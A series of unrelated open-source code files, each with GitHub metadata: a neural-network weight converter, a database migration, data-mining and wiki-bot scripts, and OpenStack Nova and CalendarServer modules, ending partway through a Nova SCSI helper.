# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
from finnthesizer import *
if __name__ == "__main__":
    # Paths: trained BNN weights (npz) in, binary weight/threshold files and
    # the generated HLS config header out.
    bnnRoot = "."
    npzFile = bnnRoot + "/cifar10-1w-2a.npz"
    targetDirBin = bnnRoot + "/cnvW1A2"
    targetDirHLS = bnnRoot + "/cnvW1A2/hw"
    #topology of convolutional layers (only for config.h defines)
    ifm = [32, 30, 14, 12, 5, 3]
    ofm = [30, 28, 12, 10, 3, 1]
    ifm_ch = [ 3, 64, 64, 128, 128, 256]
    ofm_ch = [64, 64, 128, 128, 256, 256]
    filterDim = [ 3, 3, 3, 3, 3, 3]
    # Per-layer fixed-point precisions (integer.fractional bits) for weights,
    # inputs and activations across the 6 conv + 3 FC layers (9 entries).
    WeightsPrecisions_integer = [1 , 1 , 1 , 1 , 1 , 1 , 1, 1, 1]
    WeightsPrecisions_fractional = [0 , 0 , 0 , 0 , 0 , 0 , 0, 0, 0]
    InputPrecisions_integer = [1 , 2 , 2 , 2 , 2 , 2 , 2, 2, 2]
    InputPrecisions_fractional = [7 , 0 , 0 , 0 , 0 , 0 , 0, 0, 0]
    ActivationPrecisions_integer = [2 , 2 , 2 , 2 , 2 , 2 , 2, 2, 16]
    ActivationPrecisions_fractional = [0 , 0 , 0 , 0 , 0 , 0 , 0, 0, 0]
    classes = ['Airplane', 'Automobile', 'Bird', 'Cat', 'Deer', 'Dog', 'Frog', 'Horse', 'Ship', 'Truck']
    #configuration of PE and SIMD counts
    peCounts = [16, 32, 16, 16, 4, 1, 1, 1, 4]
    simdCounts = [ 3, 32, 32, 32, 32, 32, 4, 8, 1]
    if not os.path.exists(targetDirBin):
        os.mkdir(targetDirBin)
    if not os.path.exists(targetDirHLS):
        os.mkdir(targetDirHLS)
    #read weights
    rHW = BNNWeightReader(npzFile, True)
    # config accumulates the C header text written to config.h at the end.
    config = "/**\n"
    config+= " * Finnthesizer Config-File Generation\n";
    config+= " *\n **/\n\n"
    config+= "#ifndef __LAYER_CONFIG_H_\n#define __LAYER_CONFIG_H_\n\n"
    # process convolutional layers
    for convl in range(0, 6):
        peCount = peCounts[convl]
        simdCount = simdCounts[convl]
        WPrecision_fractional = WeightsPrecisions_fractional[convl]
        APrecision_fractional = ActivationPrecisions_fractional[convl]
        IPrecision_fractional = InputPrecisions_fractional[convl]
        WPrecision_integer = WeightsPrecisions_integer[convl]
        APrecision_integer = ActivationPrecisions_integer[convl]
        IPrecision_integer = InputPrecisions_integer[convl]
        print("Using peCount = %d simdCount = %d for engine %d" % (peCount, simdCount, convl))
        # use fixed point weights for the first layer
        (usePopCount, numThresBits, numThresIntBits) = (False, 24, 16) if convl==0 else (False, 16, None)
        (w,t) = rHW.readConvBNComplex(WPrecision_fractional, APrecision_fractional, IPrecision_fractional, \
                WPrecision_integer, APrecision_integer, IPrecision_integer, \
                usePopCount=usePopCount, numThresBits=numThresBits, numThresIntBits=numThresIntBits)
        # compute the padded width and height
        paddedH = padTo(w.shape[0], peCount)
        paddedW = padTo(w.shape[1], simdCount)
        # compute memory needed for weights and thresholds
        neededWMem = (paddedW * paddedH) // (simdCount * peCount)
        neededTMem = paddedH // peCount
        print("Layer %d: %d x %d" % (convl, paddedH, paddedW))
        print("WMem = %d TMem = %d" % (neededWMem, neededTMem))
        print("IPrecision = %d.%d WPrecision = %d.%d APrecision = %d.%d" % (IPrecision_integer, IPrecision_fractional, \
                WPrecision_integer,WPrecision_fractional, APrecision_integer, APrecision_fractional))
        m = BNNProcElemMem(peCount, simdCount, neededWMem, neededTMem, WPrecision_integer, APrecision_integer, IPrecision_integer, \
                WPrecision_fractional, APrecision_fractional, IPrecision_fractional, numThresBits=numThresBits, numThresIntBits=numThresIntBits)
        m.addMatrix(w,t,paddedW,paddedH)
        config += (printConvDefines("L%d" % convl, filterDim[convl], ifm_ch[convl], ifm[convl], ofm_ch[convl], ofm[convl], simdCount, \
                peCount, neededWMem, neededTMem, WPrecision_integer, APrecision_integer, WPrecision_fractional, APrecision_fractional)) + "\n"
        #generate HLS weight and threshold header file to initialize memory directly on bitstream generation
        # m.createHLSInitFiles(targetDirHLS + "/memdata-" + str(convl) + ".h", str(convl))
        #generate binary weight and threshold files to initialize memory during runtime
        #because HLS might not work for very large header files
        m.createBinFiles(targetDirBin, str(convl))
    # process fully-connected layers
    for fcl in range(6,9):
        peCount = peCounts[fcl]
        simdCount = simdCounts[fcl]
        WPrecision_fractional = WeightsPrecisions_fractional[fcl]
        APrecision_fractional = ActivationPrecisions_fractional[fcl]
        IPrecision_fractional = InputPrecisions_fractional[fcl]
        WPrecision_integer = WeightsPrecisions_integer[fcl]
        APrecision_integer = ActivationPrecisions_integer[fcl]
        IPrecision_integer = InputPrecisions_integer[fcl]
        print("Using peCount = %d simdCount = %d for engine %d" % (peCount, simdCount, fcl))
        # The last FC layer (the classifier output) has no thresholds and is
        # padded to a fixed multiple of 64.
        if fcl == 8:
            (w,t) = rHW.readFCBNComplex_no_thresholds(WPrecision_fractional, APrecision_fractional, IPrecision_fractional, \
                WPrecision_integer, APrecision_integer, IPrecision_integer)
            paddedH = padTo(w.shape[0], 64)
            useThresholds = False
        else:
            (w,t) = rHW.readFCBNComplex(WPrecision_fractional, APrecision_fractional, IPrecision_fractional, \
                WPrecision_integer, APrecision_integer, IPrecision_integer)
            paddedH = padTo(w.shape[0], peCount)
            useThresholds = True
        # compute the padded width and height
        paddedW = padTo(w.shape[1], simdCount)
        # compute memory needed for weights and thresholds
        neededWMem = (paddedW * paddedH) // (simdCount * peCount)
        neededTMem = paddedH // peCount
        print("Layer %d: %d x %d" % (fcl, paddedH, paddedW))
        print("WMem = %d TMem = %d" % (neededWMem, neededTMem))
        print("IPrecision = %d.%d WPrecision = %d.%d APrecision = %d.%d" % (IPrecision_integer, IPrecision_fractional, WPrecision_integer,\
                WPrecision_fractional, APrecision_integer, APrecision_fractional))
        m = BNNProcElemMem(peCount, simdCount, neededWMem, neededTMem, WPrecision_integer, APrecision_integer, IPrecision_integer, \
                WPrecision_fractional, APrecision_fractional, IPrecision_fractional)
        m.addMatrix(w,t,paddedW,paddedH)
        config += (printFCDefines("L%d" % fcl, simdCount, peCount, neededWMem, neededTMem, paddedW, paddedH, \
                WPrecision_integer, APrecision_integer, WPrecision_fractional, APrecision_fractional)) + "\n"
        #generate HLS weight and threshold header file to initialize memory directly on bitstream generation
        # m.createHLSInitFiles(targetDirHLS + "/memdata-" + str(fcl) + ".h", str(fcl), useThresholds)
        #generate binary weight and threshold files to initialize memory during runtime
        #because HLS might not work for very large header files
        m.createBinFiles(targetDirBin, str(fcl), useThresholds)
    # Finish and write the generated header, then the class-label list.
    config+="#endif //__LAYER_CONFIG_H_\n"
    configFile = open(targetDirHLS+"/config.h", "w")
    configFile.write(config)
    configFile.close()
    with open(targetDirBin + "/classes.txt", "w") as f:
        f.write("\n".join(classes))
| {
"content_hash": "6499a84c8b16c87c1082e23192442b34",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 140,
"avg_line_length": 53.40963855421687,
"alnum_prop": 0.666704263478457,
"repo_name": "Xilinx/BNN-PYNQ",
"id": "f8689dec5ad564574cb891a8bc4834ab2b61f4b1",
"size": "8866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bnn/src/training/cifar10-gen-weights-W1A2.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "15377"
},
{
"name": "C++",
"bytes": "144353"
},
{
"name": "Dockerfile",
"bytes": "5626"
},
{
"name": "Jupyter Notebook",
"bytes": "7698409"
},
{
"name": "Python",
"bytes": "158919"
},
{
"name": "Shell",
"bytes": "14256"
},
{
"name": "Tcl",
"bytes": "520413"
}
],
"symlink_target": ""
} |
"""empty message
Revision ID: 298bbf22bdb8
Revises: b976e7a7dc35
Create Date: 2017-04-02 13:11:00.655727
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '298bbf22bdb8'        # this migration
down_revision = 'b976e7a7dc35'   # the migration this one builds on
branch_labels = None
depends_on = None
def upgrade():
    """Add the three person role flags as non-nullable booleans."""
    # ### commands auto generated by Alembic - please adjust! ###
    flag_columns = ('is_admin', 'is_brewer', 'is_manager')
    for column_name in flag_columns:
        op.add_column('person', sa.Column(column_name, sa.Boolean()))
    # Backfill existing rows before tightening the nullability constraint.
    op.execute('UPDATE person SET is_admin=False, is_brewer=False, is_manager=False')
    for column_name in flag_columns:
        op.alter_column('person', column_name, nullable=False)
    # ### end Alembic commands ###
def downgrade():
    """Remove the three person role flags (reverse of upgrade)."""
    # ### commands auto generated by Alembic - please adjust! ###
    # Drop in the reverse order of creation.
    for column_name in ('is_manager', 'is_brewer', 'is_admin'):
        op.drop_column('person', column_name)
    # ### end Alembic commands ###
| {
"content_hash": "7476f4516b02309e2aaf39009ca6d8da",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 85,
"avg_line_length": 31.166666666666668,
"alnum_prop": 0.6737967914438503,
"repo_name": "CapitalD/taplist",
"id": "25f1970b18bcd9b8f90cffabbd29a6cbd65cf459",
"size": "1122",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "migrations/versions/298bbf22bdb8_.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1628"
},
{
"name": "HTML",
"bytes": "51309"
},
{
"name": "JavaScript",
"bytes": "1871"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "45741"
}
],
"symlink_target": ""
} |
import MySQLdb
import Apriori
# get tags data from db
# Builds {article_id: [tag_id, ...]} from article_tags, then runs Apriori on it.
# NOTE(review): connection credentials are empty — presumably filled in locally.
db = MySQLdb.connect( "localhost", "", "", "" )
cursor = db.cursor()
sql = "SELECT * FROM article_tags LIMIT 0,50000"
tagsdata = {}
try:
    cursor.execute( sql )
    result = cursor.fetchall()
    for row in result:
        # NOTE(review): 'tags' is never used and 'id' shadows the builtin.
        tags = []
        id = row[0]
        articleid = row[1]
        tagid = row[2]
        # Group all tag ids under their article id.
        if articleid not in tagsdata:
            tagsdata[articleid] = []
        tagsdata[articleid].append(tagid)
        #print "id is %d, article_id is %s, tag_id is %d" % ( id, articleid, tagid )
except MySQLdb.Error,e:
    print "Error: unable to fecht db! %d: %s" % (e.args[0],e.args[1])
print "data count is ", len( tagsdata )
# Mine association rules over the per-article tag sets.
apriori = Apriori.Apriori( tagsdata )
apriori.main()
db.close()
"content_hash": "6ec2701ac81a68c3d04f19fbf77c533a",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 78,
"avg_line_length": 24.928571428571427,
"alnum_prop": 0.6547277936962751,
"repo_name": "jjyoung/Apriori",
"id": "57b338d3e57a1c4e2cb7cd574c2f5005ebcc5bf3",
"size": "788",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tool_tagsRelation.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "6521"
}
],
"symlink_target": ""
} |
import codecs
from collections import defaultdict, OrderedDict
import json
import re
import glob, os
import math
import itertools
# Input files (paths are relative to IN_DIR after main() chdirs there).
f_in = "tweets_taxonomy_clean.JSON"      # one JSON taxonomy record per line
f_in_user_ids = "user_IDs.dat"           # whitespace-separated: user_id user_name
IN_DIR = "../DATA/taxonomy_stats/"
def read_user_IDs():
	"""Read f_in_user_ids and return a defaultdict mapping user name -> user ID."""
	id_by_user = defaultdict(str)
	with codecs.open(f_in_user_ids, 'r', encoding='utf8') as ids_file:
		for record in ids_file:
			fields = record.split()
			# File layout: first column is the ID, second the user name.
			id_by_user[fields[1]] = fields[0]
	return id_by_user
def read_save_taxonomy(users="ALL", user_list=None, WRITE=False,TOP_N = 20):
	"""Aggregate per-tweet taxonomy scores and sentiments from f_in.

	Builds a nested dict (taxonomies_sum) mirroring the taxonomy tree, with
	accumulated "size" (confidence score) and "sentiment" per node, and a
	docSentiment_sum summary. If WRITE, dumps the tree as D3-style JSON.
	NOTE(review): users/user_list/TOP_N are currently unused — confirm intent.
	"""
	docSentiment_sum = defaultdict(int)
	taxonomies_sum = defaultdict(int)
	user_ids = read_user_IDs()
	cnt = 0
	with codecs.open(f_in,'r', encoding='utf8') as input_file:
		for line7s in input_file:
			# Accessing all expected keys up front makes KeyError skip
			# malformed records in one place.
			try:
				line = json.loads(line7s)
				taxonomy_all = line["taxonomy"]
				keywords = taxonomy_all["keywords"]
				entities = taxonomy_all["entities"]
				taxonomy = taxonomy_all["taxonomy"]
				docSentiment = taxonomy_all["docSentiment"]
				concepts = taxonomy_all["concepts"]
			except KeyError:
				#print line7s
				continue
			sentiment = docSentiment["type"]
			if sentiment == "neutral":
				docSentiment_sum[sentiment] += 1
			else:
				# Non-neutral sentiments accumulate (score_sum, count, mixed_count).
				if not sentiment in docSentiment_sum:
					docSentiment_sum[sentiment] = defaultdict(int)
				old_score = docSentiment_sum[sentiment][0]
				old_cnt = docSentiment_sum[sentiment][1]
				old_mixed_cnt = docSentiment_sum[sentiment][2]
				try:
					new_score = old_score + float(docSentiment["score"])
				except KeyError:
					continue
				new_cnt = old_cnt + 1
				try:
					new_mixed_cnt = old_mixed_cnt + int(docSentiment["mixed"])
				except KeyError:
					continue
				docSentiment_sum[sentiment] = (new_score, new_cnt, new_mixed_cnt)
			for el in taxonomy:
				# NOTE(review): 'except: KeyError' is a bare except followed by a
				# no-op expression — almost certainly meant 'except KeyError:'.
				try:
					if el["confident"] == "no":
						continue
				except: KeyError
				taxonomy_tree = el["label"]
				taxonomy_tree = taxonomy_tree.split("/")
				taxonomy_tree.pop(0)
				levels = len(taxonomy_tree)
				s = taxonomies_sum
				# go until the last element; on the last, we will not create a dict NONO
				for tax_class in taxonomy_tree:
					#print tax_class
					if tax_class not in s.keys():
						s[tax_class] = defaultdict(int)
					#print taxonomies_sum
					#return
					s = s[tax_class]
				#last_tax_class = taxonomy_tree[levels-1]
				#s = s[last_tax_class]
				old_score = s["size"]
				#old_cnt = s[tax_class][1]
				#old_sent = s[tax_class][2]
				new_score = old_score + float(el["score"])
				s["size"] = new_score
				# this shows that it takes as confident only those above 0.4
				if float(el["score"]) < 0.4:
					print float(el["score"])
				if sentiment <> "neutral":
					old_sent = s["sentiment"]
					new_sent = old_sent + float(docSentiment["score"])
					s["sentiment"] = new_sent
			cnt += 1
	com_size = cnt
	N = cnt
	print cnt
	print "Total taxonomies on different levels found ", len(taxonomies_sum)
	print "Total Sentiments found ", len(docSentiment_sum)
	if WRITE:
		# Wrap the converted tree in a root "thing" node, D3 flare style.
		f_out_name = "ALL/taxon_ALL.json"
		#taxonomies_out7s = recursive_writeable_json_from_dict(taxonomies_sum)
		print len(taxonomies_sum), type(taxonomies_sum)
		#for el in taxonomies_sum.items():
		#	print el
		taxonomies_out7s = recursive_writeable_json_from_dict(taxonomies_sum, "thing")
		print len(taxonomies_out7s), type(taxonomies_out7s)
		with codecs.open(f_out_name,'w', encoding='utf8') as f:
			f.write("{ \"name\": \"thing\", \n \"children\": \n ")
			f.write(unicode(json.dumps(taxonomies_out7s, ensure_ascii=False)) + '\n')
			f.write("\n }")
def recursive_writeable_json_from_dict(d, dname):
	"""Convert the nested accumulator dict into a D3-style children list.

	Leaf nodes become {"name": ..., "size": ...}; inner nodes become
	{"name": ..., "children": [...]}. dname names the current node when its
	own "size" entry is emitted alongside its children.
	"""
	# stop criteria: len(d) == 1 means this is a leaf
	# (should not allow here to arrive, for example { "size": 1.381699 } )
	# only, for example { "poetry": { "size": 1.381699 } }
	if len(d) == 1:
		s = {}
		#print d, d.items()[0][1], d.items()[0][0]
		s["size"] = d.items()[0][1]["size"]
		s["name"] = d.items()[0][0]
		#print s["name"]
		return s
	# recursive criteria satisfied: create a new dict
	# add me my children, since I have
	#s = {}
	#s["children"] = []
	s = []
	for child_k in d.keys():
		if child_k == "size":
			# The node's own accumulated score becomes a sibling leaf named dname.
			if d[child_k] <> 0:
				#s["size"] = d[child_k]
				s.append({"size":d[child_k], "name":dname})
		else:
			child_el = d[child_k]
			ss = {"name": child_k}
			# NOTE(review): 'except: KeyError' is a bare except followed by a
			# no-op expression — almost certainly meant 'except KeyError:'.
			try:
				ss["size"] = child_el["size"]
			except: KeyError
			# this is a check to avoid passing { "size": 1.381699 }
			#if child_el.items()[0][0] == "size" and len(child_el) == 1:
			#	s["children"].append()
			#	continue
			#print child_el
			#if len(child_el) > 1:
			#ss["children"] = recursive_writeable_json_from_dict(child_el)
			if child_el.items()[0][0] == "size" and len(child_el) == 1:
				#s["children"].append(ss)
				s.append(ss)
				continue
			ss["children"] = recursive_writeable_json_from_dict(child_el, child_k)
			#s["children"].append(ss)
			s.append(ss)
	return s
def main():
	# Work inside the stats directory so the relative input/output paths resolve.
	os.chdir(IN_DIR)
	read_save_taxonomy(WRITE=True)
main()
| {
"content_hash": "a9ad2cf221db3fc42365ff9f9d7edd16",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 90,
"avg_line_length": 32.984375,
"alnum_prop": 0.49313121743249644,
"repo_name": "sanja7s/SR_Twitter",
"id": "2ceaa1301c8a4a200b8bb9fee0f53fdac6f2689c",
"size": "6380",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src_taxonomy/visualize_taxonomy_ALL.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1100223"
}
],
"symlink_target": ""
} |
import functools
import sys
from oslo_config import cfg
from nova.compute import utils as compute_utils
from nova import exception
from nova.image import glance
from nova.openstack.common import log as logging
from nova import utils
from nova.virt.xenapi import vm_utils
# Global oslo.config handle; pull in the glance retry-count option so
# CONF.glance.num_retries is available below.
CONF = cfg.CONF
CONF.import_opt('num_retries', 'nova.image.glance', group='glance')
LOG = logging.getLogger(__name__)
class GlanceStore(object):
    # Image up/download for XenAPI via the dom0 "glance" plugin, with retry
    # and glance-server rotation handled by the session helper.
    def _call_glance_plugin(self, context, instance, session, fn, params):
        """Invoke plugin function fn with params, retrying across glance servers."""
        glance_api_servers = glance.get_api_servers()
        def pick_glance(kwargs):
            # Called before each attempt: rotate to the next glance server
            # and inject its connection details into the plugin kwargs.
            g_host, g_port, g_use_ssl = glance_api_servers.next()
            kwargs['glance_host'] = g_host
            kwargs['glance_port'] = g_port
            kwargs['glance_use_ssl'] = g_use_ssl
            return g_host
        def retry_cb(context, instance, exc=None):
            # Called after a failed attempt: record the fault on the instance.
            if exc:
                exc_info = sys.exc_info()
                LOG.debug(exc.message, exc_info=exc_info)
                compute_utils.add_instance_fault_from_exc(
                    context, instance, exc, exc_info)
        cb = functools.partial(retry_cb, context, instance)
        return session.call_plugin_serialized_with_retry(
            'glance', fn, CONF.glance.num_retries, pick_glance, cb, **params)
    def _make_params(self, context, session, image_id):
        """Build the base kwargs shared by the download and upload plugin calls."""
        return {'image_id': image_id,
                'sr_path': vm_utils.get_sr_path(session),
                'extra_headers': glance.generate_identity_headers(context)}
    def download_image(self, context, session, instance, image_id):
        """Fetch image_id via the plugin; returns the plugin's VDI description."""
        params = self._make_params(context, session, image_id)
        params['uuid_stack'] = vm_utils._make_uuid_stack()
        try:
            vdis = self._call_glance_plugin(context, instance, session,
                                            'download_vhd', params)
        except exception.PluginRetriesExceeded:
            raise exception.CouldNotFetchImage(image_id=image_id)
        return vdis
    def upload_image(self, context, session, instance, image_id, vdi_uuids):
        """Upload the VHD chain in vdi_uuids to glance as image_id."""
        params = self._make_params(context, session, image_id)
        params['vdi_uuids'] = vdi_uuids
        # Image properties recorded alongside the upload.
        props = params['properties'] = {}
        props['auto_disk_config'] = instance['auto_disk_config']
        props['os_type'] = instance.get('os_type', None) or (
            CONF.xenserver.default_os_type)
        compression_level = vm_utils.get_compression_level()
        if compression_level:
            props['xenapi_image_compression_level'] = compression_level
        auto_disk_config = utils.get_auto_disk_config_from_instance(instance)
        if utils.is_auto_disk_config_disabled(auto_disk_config):
            props["auto_disk_config"] = "disabled"
        try:
            self._call_glance_plugin(context, instance, session,
                                     'upload_vhd', params)
        except exception.PluginRetriesExceeded:
            raise exception.CouldNotUploadImage(image_id=image_id)
| {
"content_hash": "6900d20a88d6b038077fd280ed4eba19",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 77,
"avg_line_length": 38.151898734177216,
"alnum_prop": 0.6184472461844724,
"repo_name": "sajeeshcs/nested_quota_final",
"id": "85599b11a02a7484450ecb7bdfd497ad69a09dd3",
"size": "3650",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/virt/xenapi/image/glance.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "5941"
},
{
"name": "Python",
"bytes": "15636233"
},
{
"name": "Shell",
"bytes": "17729"
},
{
"name": "XML",
"bytes": "45372"
}
],
"symlink_target": ""
} |
"""
CalDAV support for Twext.Web2.
See RFC 4791.
"""
#
# Load in suitable file extension/content-type map from OS X
#
from txweb2.static import File, loadMimeTypes
# Replace the static-file MIME map with the OS-provided one.
# NOTE(review): whether loadMimeTypes merges or takes the first existing file
# is defined in txweb2.static — confirm before relying on precedence.
File.contentTypes = loadMimeTypes(("/etc/apache2/mime.types", "/etc/httpd/mime.types",))
#
# Register additional WebDAV XML elements
#
import twistedcaldav.caldavxml
import twistedcaldav.carddavxml
import twistedcaldav.mkcolxml
import twistedcaldav.customxml
import twistedcaldav.timezonexml
twistedcaldav # Shhh.. pyflakes
#
# DefaultHTTPHandler
#
from txweb2.http_headers import DefaultHTTPHandler, last, singleHeader
# Register parsing/generation for the scheduling headers this server uses:
# If-Schedule-Tag-Match is parsed as a plain string, Schedule-Tag is emitted
# as a single string-valued header.
DefaultHTTPHandler.updateParsers({
    "If-Schedule-Tag-Match": (last, str),
})
DefaultHTTPHandler.updateGenerators({
    "Schedule-Tag": (str, singleHeader),
})
# Do some PyCalendar init
from pycalendar.icalendar.calendar import Calendar
from pycalendar.icalendar.property import Property
from pycalendar.vcard.card import Card
from pycalendar.value import Value
# Stamp generated iCalendar/vCard data with this server's PRODID.
Calendar.setPRODID("-//CALENDARSERVER.ORG//NONSGML Version 1//EN")
Card.setPRODID("-//CALENDARSERVER.ORG//NONSGML Version 1//EN")
# These are properties we use directly and we want the default value type set for TEXT
Property.registerDefaultValue("X-CALENDARSERVER-PRIVATE-COMMENT", Value.VALUETYPE_TEXT)
Property.registerDefaultValue("X-CALENDARSERVER-ATTENDEE-COMMENT", Value.VALUETYPE_TEXT)
# Travel-time X-properties always serialize an explicit VALUE= parameter.
Property.registerDefaultValue("X-APPLE-TRAVEL-DURATION", Value.VALUETYPE_DURATION, always_write_value=True)
Property.registerDefaultValue("X-APPLE-TRAVEL-START", Value.VALUETYPE_URI, always_write_value=True)
Property.registerDefaultValue("X-APPLE-TRAVEL-RETURN-DURATION", Value.VALUETYPE_DURATION, always_write_value=True)
Property.registerDefaultValue("X-APPLE-TRAVEL-RETURN", Value.VALUETYPE_URI, always_write_value=True)
| {
"content_hash": "9376642ad47b895a246cd3208990155c",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 114,
"avg_line_length": 31.785714285714285,
"alnum_prop": 0.801123595505618,
"repo_name": "red-hood/calendarserver",
"id": "c8453d5d7eb410f5c68e160f3dd09663117027e2",
"size": "2427",
"binary": false,
"copies": "1",
"ref": "refs/heads/trunk",
"path": "twistedcaldav/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1482"
},
{
"name": "CSS",
"bytes": "4214"
},
{
"name": "DIGITAL Command Language",
"bytes": "1234"
},
{
"name": "DTrace",
"bytes": "13143"
},
{
"name": "HTML",
"bytes": "36120"
},
{
"name": "JavaScript",
"bytes": "80248"
},
{
"name": "Makefile",
"bytes": "14429"
},
{
"name": "PLSQL",
"bytes": "12719"
},
{
"name": "PLpgSQL",
"bytes": "291431"
},
{
"name": "Python",
"bytes": "10537612"
},
{
"name": "R",
"bytes": "1091"
},
{
"name": "SQLPL",
"bytes": "6430"
},
{
"name": "Shell",
"bytes": "96975"
}
],
"symlink_target": ""
} |
"""
Include Commons template in home wiki.
This bot functions mainly in the en.wikipedia, because it
compares the names of articles and category in English
language (standard language in Commons). If the name of
an article in Commons will not be in English but with
redirect, this also functions.
Run:
Syntax:
python pwb.py commons_link [action] [pagegenerator]
where action can be one of these:
* pages : Run over articles, include {{commons}}
* categories : Run over categories, include {{commonscat}}
and pagegenerator can be one of these:
&params;
"""
#
# (C) Leonardo Gregianin, 2006
# (C) Pywikibot team, 2007-2017
#
# Distributed under the terms of the MIT license.
#
# Ported by Geoffrey "GEOFBOT" Mon for Google Code-In 2013
# User:Sn1per
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id$'
import re
import pywikibot
from pywikibot import textlib, pagegenerators, i18n, Bot
# Token substituted into the module docstring when pywikibot renders help.
# The key was HTML-entity-mangled ('&para;' -> U+00B6) at some point; the
# pywikibot convention is the literal '&params;' placeholder.
docuReplacements = {
    '&params;': pagegenerators.parameterHelp,
}
class CommonsLinkBot(Bot):
    """Commons linking bot.

    Adds {{commons}} to articles or {{commonscat}} to categories whose title
    matches a page of the same name on Wikimedia Commons.
    """
    def __init__(self, generator, **kwargs):
        """Constructor."""
        self.availableOptions.update({
            'action': None,
        })
        super(CommonsLinkBot, self).__init__(**kwargs)
        self.generator = generator
        # Precompiled probes for templates that already link to Commons.
        self.findTemplate = re.compile(r'\{\{[Ss]isterlinks')
        self.findTemplate2 = re.compile(r'\{\{[Cc]ommonscat')
        self.findTemplate3 = re.compile(r'\{\{[Cc]ommons')
    def run(self):
        """Run the bot."""
        if not all((self.getOption('action'), self.generator)):
            return
        # catmode selects the category variant everywhere below via
        # two-tuple indexing: ('pages-value', 'categories-value')[catmode].
        catmode = (self.getOption('action') == 'categories')
        for page in self.generator:
            try:
                self.current_page = page
                commons = page.site.image_repository()
                # Look up the same-named Page/Category on Commons.
                commonspage = getattr(pywikibot,
                                      ('Page', 'Category')[catmode]
                                      )(commons, page.title())
                try:
                    commonspage.get(get_redirect=True)
                    pagetitle = commonspage.title(withNamespace=not catmode)
                    if page.title() == pagetitle:
                        oldText = page.get()
                        text = oldText
                        # for Commons/Commonscat template
                        s = self.findTemplate.search(text)
                        s2 = getattr(self, 'findTemplate%d'
                                     % (2, 3)[catmode]).search(text)
                        if s or s2:
                            pywikibot.output(u'** Already done.')
                        else:
                            # Insert the template just before the category links.
                            cats = textlib.getCategoryLinks(text,
                                                            site=page.site)
                            text = textlib.replaceCategoryLinks(
                                u'%s{{commons%s|%s}}'
                                % (text, ('', 'cat')[catmode], pagetitle),
                                cats, site=page.site)
                            comment = i18n.twtranslate(
                                page.site, 'commons_link%s-template-added'
                                % ('', '-cat')[catmode])
                            try:
                                self.userPut(page, oldText, text,
                                             summary=comment)
                            except pywikibot.EditConflict:
                                pywikibot.output(
                                    u'Skipping %s because of edit conflict'
                                    % page.title())
                except pywikibot.NoPage:
                    pywikibot.output(u'%s does not exist in Commons'
                                     % page.__class__.__name__)
            except pywikibot.NoPage:
                pywikibot.output(u'Page %s does not exist' % page.title())
            except pywikibot.IsRedirectPage:
                pywikibot.output(u'Page %s is a redirect; skipping.'
                                 % page.title())
            except pywikibot.LockedPage:
                pywikibot.output(u'Page %s is locked' % page.title())
def main(*args):
    """Process command line arguments and invoke bot.

    If args is an empty list, sys.argv is used.

    @param args: command line arguments
    @type args: list of unicode
    """
    options = {}
    factory = pagegenerators.GeneratorFactory()
    # Split the arguments into bot options and generator options.
    for argument in pywikibot.handle_args(args):
        if argument in ('pages', 'categories'):
            options['action'] = argument
        elif argument == '-always':
            options['always'] = True
        else:
            factory.handleArg(argument)
    generator = factory.getCombinedGenerator(preload=True)
    if 'action' in options and generator:
        CommonsLinkBot(generator, **options).run()
        return True
    # Missing action and/or generator: print targeted usage help.
    pywikibot.bot.suggest_help(missing_action='action' not in options,
                               missing_generator=not generator)
    return False
if __name__ == "__main__":
    main()
| {
"content_hash": "1c86e1fc5aeee52fae7c01bc8d078d38",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 76,
"avg_line_length": 33.5359477124183,
"alnum_prop": 0.5145195868251803,
"repo_name": "Darkdadaah/pywikibot-core",
"id": "3ddffaf5d093141550d2f0941e9656b18e1ce9a0",
"size": "5173",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "scripts/commons_link.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "97"
},
{
"name": "HTML",
"bytes": "1365"
},
{
"name": "Python",
"bytes": "4423996"
}
],
"symlink_target": ""
} |
"""Generic linux scsi subsystem utilities."""
from nova import exception
from nova.openstack.common import log as logging
from nova import utils
LOG = logging.getLogger(__name__)
def echo_scsi_command(path, content):
    """Write *content* to *path* (via ``tee -a`` as root) to poke the
    scsi subsystem through sysfs."""
    utils.execute('tee', '-a', path,
